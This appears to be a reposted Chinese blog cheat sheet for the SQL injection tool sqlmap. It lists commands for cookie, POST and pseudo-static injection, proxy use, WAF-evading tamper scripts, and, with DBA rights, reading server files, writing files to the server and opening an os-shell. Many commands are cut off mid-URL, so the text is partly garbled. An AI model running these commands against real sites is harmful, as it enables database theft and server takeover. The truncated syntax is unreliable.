Sqlmap常规命令:
ACCESS(一个数据库):
Sqlmap -u “http: Sqlmap -u “http: Sqlmap -u “http:
MYSQL(多个数据库):
Sqlmap -u “http: Sqlmap -u “http: Sqlmap -u “http: Sqlmap -u “http: Sqlmap -u “http: Cookie注入:Sqlmap -u “http:
POST注入:
两者区别根据具体情况选择
-r:用burp抓包保存为1.txt在sqlmap根目录,一般登陆框利用较多
Sqlmap.py -r “1.txt”
sqlmap -u “http:
伪静态注入:
在存在注入的地方加上*,然后获取数据库
sqlmap.py -u “http:
Sqlmap代理:
HTTP(S)代理:
如:
sqlmap -u “http: proxy-file:加载代理ip列表 如:sqlmap.py -u“http://www.xxx.com/shownews.asp?id=1〃 -proxy-file=dl.txt(代理ip文件) ignore-proxy:忽略本地代理设置 proxy http: Tor代理模式:这个我没试过,就不贴语法了。
Sqlmap的tamper过waf脚本整理:
注:自己常用的脚本
space2morehash.py space2hash.py(绕过过滤‘=’) base64encode.py(用base64编码替换)
charencode.py space2comment.py charunicodeencode.py(字符串unicode编码) chardoubleencode.py(双url编码)unmagicquotes.py(宽字符绕过 GPC addslashes) randomcomments.py(用/**/分割sql关键字) appendnullbyte.py(在有效负荷结束位置加载零字节字符编码)
Tamper语法:
batch:要求不对目标写入(碰到任何提示默认回车)
tamper:使用干预脚本
-v 3(3为等级)
注意:若不使用3等级无法继续下一步操作。
语法:sqlmap.py -u “http:
注意:mysql access等数据库的tamper脚本还是有所区别的
带上一个大佬整理的各个数据库对应的tamper脚本链接
https://blog.csdn.net/hxsstar/article/details/22782627
Sqlmap之请求延迟:
Sqlmap.py -u “http:
如果有网站dba权限,且可以读取写入文件,那么可以直接os-shell或者以下命令
-file-read /home/www/index.php 读取指定文件 -file-write 写入本地文件(- -file-write “c:\test\1.txt” -file-dest “/home/www/feizhu.txt” 本地的1.txt文件写入到远程服务器feizhu.txt(此处需要有网站写入权限) sqlmap连接数据库: sqlmap.py -d mysql:
来源:博客园
作者:逍遥人y
链接:https://www.cnblogs.com/yjxing/p/11505982.html